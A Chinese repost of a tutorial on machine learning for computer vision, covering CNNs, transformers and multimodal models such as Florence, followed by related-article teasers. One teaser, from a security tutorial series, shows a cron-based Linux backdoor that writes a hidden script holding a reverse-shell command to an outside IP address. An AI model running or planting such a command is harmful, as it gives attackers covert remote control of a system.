适用于计算机视觉的机器学习

使用筛选器将效果应用于图像的功能在图像处理任务中非常有用,例如可能使用图像编辑软件执行的任务。 但是,计算机视觉的目标通常是从图像中提取含义或至少是可操作的见解,这需要创建经过训练以基于大量现有图像识别特征的机器学习模型。

卷积神经网络 (CNN)

计算机视觉最常见的机器学习模型体系结构之一是卷积神经网络 (CNN),这是一种深度学习体系结构。 CNN 使用筛选器从图像中提取数值特征图,然后将特征值馈送到深度学习模型中以生成标签预测。 例如,在图像分类方案中,标签表示图像的主要主题(换句话说,这是一张关于什么的图像?)。 你可以使用不同种类的水果(如苹果、香蕉和橙子)的图像训练一个 CNN 模型,使预测的标签是给定图像中的水果类型。

在 CNN 的训练过程中,筛选器内核最初是使用随机生成的权重值定义的。 然后,随着训练过程的进行,根据已知标签值评估模型预测,并调整筛选器权重以提高准确性。 最终,经过训练的水果图像分类模型使用能够最好地提取有助于识别不同种类水果特征的筛选器权重。

下图演示了图像分类模型的 CNN 的工作原理:

  1. 具有已知标签的图像(例如,0:苹果、1:香蕉或 2:橙子)将馈送到网络中以训练模型。
  2. 当每个图像通过网络馈送时,使用一个或多个筛选器从图像中提取特征。 筛选器内核最初是随机分配的权重,并生成称为特征图的数值数组。
  3. 特征图平展为特征值的一维数组。
  4. 特征值馈送到完全连接的神经网络中。
  5. 神经网络的输出层使用 softmax 或类似函数生成包含每个可能类的概率值的结果,例如 [0.2, 0.5, 0.3]。

在训练期间,将输出概率与实际类标签进行比较,例如,香蕉(类 1)的图像应具有值 [0.0, 1.0, 0.0]。 预测类分数与实际类分数之间的差异用于计算模型中的损失,并修改完全连接的神经网络中的权重和特征提取层中的筛选器内核,以减少损失。

训练过程会重复多个时期,直到学习到一组最优的权重。 然后,保存权重,模型可用于预测标签未知的新图像的标签。

CNN 体系结构通常包含多个卷积筛选器层和附加层,以减小特征图的大小、约束提取值,或者操作特征值。 在此简化的示例中省略了这些层,重点介绍关键概念,即筛选器用于从图像中提取数字特征,然后在神经网络中使用这些特征来预测图像标签。

转换器和多模态模型

CNN 多年来一直是计算机视觉解决方案的核心。 它们不仅通常用于解决前面所述的图像分类问题,也是更复杂的计算机视觉模型的基础。 例如,物体检测模型将 CNN 特征提取层与图像中兴趣区域的识别相结合,在同一图像中查找多个类的物体。

Transformers

几十年来,计算机视觉的大多进步都是由基于 CNN 的模型的改进推动的。 然而,在另一个 AI 学科 - 自然语言处理 (NLP) 中,另一种类型的神经网络体系结构(称为转换器)使得复杂语言模型的开发成为可能。 转换器的工作原理是处理大量数据,并将语言标记(表示单个单词或短语)编码为基于向量的嵌入(数值数组)。 可以将嵌入视为表示一组维度,每个维度表示标记的某些语义属性。 创建嵌入,使得在相同上下文中常用的标记在维度上比不相关的单词更接近。

下图是一个简单的示例,显示了编码为三维向量并在三维空间中绘制的一些单词:

语义相似的标记在类似的位置进行编码,创建语义语言模型,从而可以为文本分析、翻译、语言生成和其他任务构建复杂的 NLP 解决方案。

我们只使用了三个维度,因为这很容易可视化。 实际上,转换器网络中的编码器会创建具有更多维度的向量,基于线性代数计算定义标记之间的复杂语义关系。 其中涉及的数学很复杂,转换器模型的体系结构也是如此。 在本文中,我们目标只是提供对编码如何创建封装实体之间关系的模型的概念性理解。

多模态模型

转换器成功作为构建语言模型的一种方法,促使 AI 研究人员考虑同样的方法是否对图像数据也有效。 研究结果是开发多模态模型,其中模型使用大量带有描述文字的图像进行训练,没有固定的标签。 图像编码器基于像素值从图像中提取特征,并将其与语言编码器创建的文本嵌入相结合。 整体模型封装了自然语言标记嵌入和图像特征之间的关系,如下所示:

Microsoft Florence 模型就是这样的模型。 此模型使用来自互联网的大量带有描述文字的图像进行训练,包括语言编码器和图像编码器。 Florence 是基础模型的一个例子。 换句话说,它是一个预先训练的通用模型,你可以基于此模型为专业任务构建多个自适应模型。 例如,可以将 Florence 用作执行以下操作的自适应模型的基础模型:

  • 图像分类:标识图像所属的类别。
  • 物体检测:查找图像中的单个物体。
  • 字幕:生成图像的相应说明。
  • 标记:编译图像的相关文本标记列表。

Florence 等多模态模型普遍处于计算机视觉和 AI 的前沿,并有望推动 AI 使各种解决方案成为可能。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/420130.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

mysql快速定位cpu 占比过高的sql语句

mysql快速定位cpu 占比过高的sql语句 当MySQL数据库的CPU使用率异常升高时,定位导致问题的SQL语句可以通过以下步骤进行 1、使用top命令找出mysl进程中占用CPU靠前的线程 #找出mysql 的进程号 ps -ef | grep mysql#根据进程号,找出占用CPU靠前的线程号…

树莓派通过串口驱动HC-08蓝牙模块

树莓派通过串口驱动HC-08蓝牙模块 文章目录 树莓派通过串口驱动HC-08蓝牙模块一、HC-08蓝牙模块介绍二、树莓派与蓝牙模块硬件连接三、树莓派通过蓝牙控制设备 一、HC-08蓝牙模块介绍 蓝牙模块,是一种集成的蓝牙功能的PCB板,用于短距离无线通信&#xff…

避障小车—51单片机

一、小车底盘组装 根据视频的安装步骤安装 二、 电机模块开发 2.1 L9110s概述 接通VCC,GND 模块电源指示灯亮, 以下资料来源官方,但是不对,根据下节课实际调试 IA1输入高电平,IA1输入低电平,【OA1 OB1…

JavaWeb【day11】--(SpringBootWeb案例)

SpringBootWeb案例 前面我们已经实现了员工信息的条件分页查询以及删除操作。 关于员工管理的功能,还有两个需要实现: 新增员工 修改员工 首先我们先完成"新增员工"的功能开发,再完成"修改员工"的功能开发。而在&quo…

PDF样本图册转换为一个链接,随时打开无需印刷

想象一下,您手中有一本厚重的样本图册,里面包含了丰富多样的内容,如产品介绍、项目方案、学术论文等。在过去,您需要逐一翻阅、筛选,甚至为了便于查看,不得不将其印刷出来。如今,借助先进的数字…

机器学习:opencv--图像形态学

目录 前言 一、常用形态学操作 二、腐蚀和膨胀 1.图像腐蚀 2.图形膨胀 三、开运算和闭运算 1.开运算 2.闭运算 四、顶帽和黑帽 1.顶帽 2.黑帽 五、梯度运算 总结 前言 图像形态学是一种用于处理和分析图像形状和结构的技术。 一、常用形态学操作 膨胀&#xff08…

都2024年了还不明白Redis持久化?RDB文件、AOF文件、AOF重写

都2024年了,不会还有人不知道redis的RDB和Aof吧?不知道没关系,看完这篇文章我相信你就会有个大概的了解和认识了 1. Redis持久化 1.1 持久化概念 Redis本身是一个基于内存的数据库,它提供了RDB持久化、AOF持久化两种方式&#…

田纳西州橡树岭全球最快的超级计算机名为Frontier

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗?订阅我们的简报,深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同,从行业内部的深度分析和实用指南中受益。不要错过这个机会,成为AI领…

记录深度学习量化操作

0. 简介 深度学习中做量化提升运行速度是最常用的方法,尤其是大模型这类非常吃GPU显存的方法。一般是高精度浮点数表示的网络权值以及激活值用低精度(例如8比特定点)来近似表示达到模型轻量化,加速深度学习模型推理,目…

第145天:内网安全-Linux权限维持Rootkit后门Strace监控Alias别名Cron定时任务

案例一:权限维持-Linux-定时任务-Cron后门 linux的计时任务,配置文件再/etc/crontab下 创建后门文件,这里可以创建成隐藏文件 vim /etc/.back.sh 反弹shell的内容 #!/bin/bash bash -i >& /dev/tcp/47.94.236.117/3333 0>&…

[数据集][目标检测]街道乱堆垃圾检测数据集VOC+YOLO格式94张1类别

数据集格式:Pascal VOC格式YOLO格式(不包含分割路径的txt文件,仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数):94 标注数量(xml文件个数):94 标注数量(txt文件个数):94 标注类别数…

联想泄露显示本月推出更便宜的Copilot Plus电脑

联想似乎准备推出新的更实惠的 Copilot Plus 电脑。可靠的爆料者Evan Blass发布了一份来自联想的新闻稿,详细介绍了将在本周晚些时候的IFA展会上宣布的各种Copilot Plus电脑,其中包括两款采用尚未公布的8核高通骁龙X Plus芯片的电脑。 这些新的高通芯片…

【前端】vue+html+js 实现table表格展示,以及分页按钮添加

一. 问题描述 数据条数太多显示到页面上时可能会渲染较慢,因此需要截取数据进行展示。 二. 代码写法 思路:按照上述图示思路,需要有两个数据列表,一个存储的是所有的列表数据,一个存储的是展示的数据列表&#xff0c…

Vue组件:使用$emit()方法监听子组件事件

1、监听自定义事件 父组件通过使用 Prop 为子组件传递数据,但如果子组件要把数据传递回去,就需要使用自定义事件来实现。父组件可以通过 v-on 指令(简写形式“”)监听子组件实例的自定义事件,而子组件可以通过调用内建…

基于单片机的人脸识别的智能门禁系统设计

文章目录 前言资料获取设计介绍功能介绍设计清单核心代码具体实现截图参考文献设计获取 前言 💗博主介绍:✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师,一名热衷于单片机技术探索与分享的博主、专注于 精通51/STM32/MSP430/AVR等…

C/C++ 中的算术运算及其陷阱(详解,举例分析)

在C/C编程中,算术运算是非常基础且常用的操作。然而,这些看似简单的运算背后却隐藏着一些潜在的陷阱,如果不加以注意,可能会导致程序出现难以预料的错误。本文将探讨C/C中常见的算术运算及其潜在的陷阱,并通过实例进行…

大数据技术体系架构

数据源 社交媒体平台 云平台 网站资源 物联网(IOT) 数据库 特点 分布式 数据源一般分布在不同的设备上,这些设备通常由网络连接在一起,网络空间的安全及其重要; 异构性 数据的来源广泛,比如社交媒…

一台手机一个ip地址吗?手机ip地址泄露了怎么办

在数字化时代,‌手机作为我们日常生活中不可或缺的一部分,‌其网络安全性也日益受到关注。‌其中一个常见的疑问便是:‌“一台手机是否对应一个固定的IP地址?‌”实际上,‌情况并非如此简单。‌本文首先解答这一问题&a…

RTX AI PC 和工作站上部署多样化 AI 应用支持 Multi-LoRA

今天的大型语言模型(LLMs)在许多用例中都取得了前所未有的成果。然而,由于基础模型的通用性,应用程序开发者通常需要定制和调整这些模型,以便专门针对其用例开展工作。 完全微调需要大量数据和计算基础设施&#xff0…

os模块函数

1、常用命令 os.getcwd() 返回当前工作目录 os.listdir() 返回指定文件路径下的文件夹列表或者文件列表 os.mkdir 创建文件夹,不能创建递归文件夹,也就是上一层文件夹必须存在,不存在时会报错,同时在指定目录下有相同的文件夹名称,再创建会报错 os.makedirs 可以创建…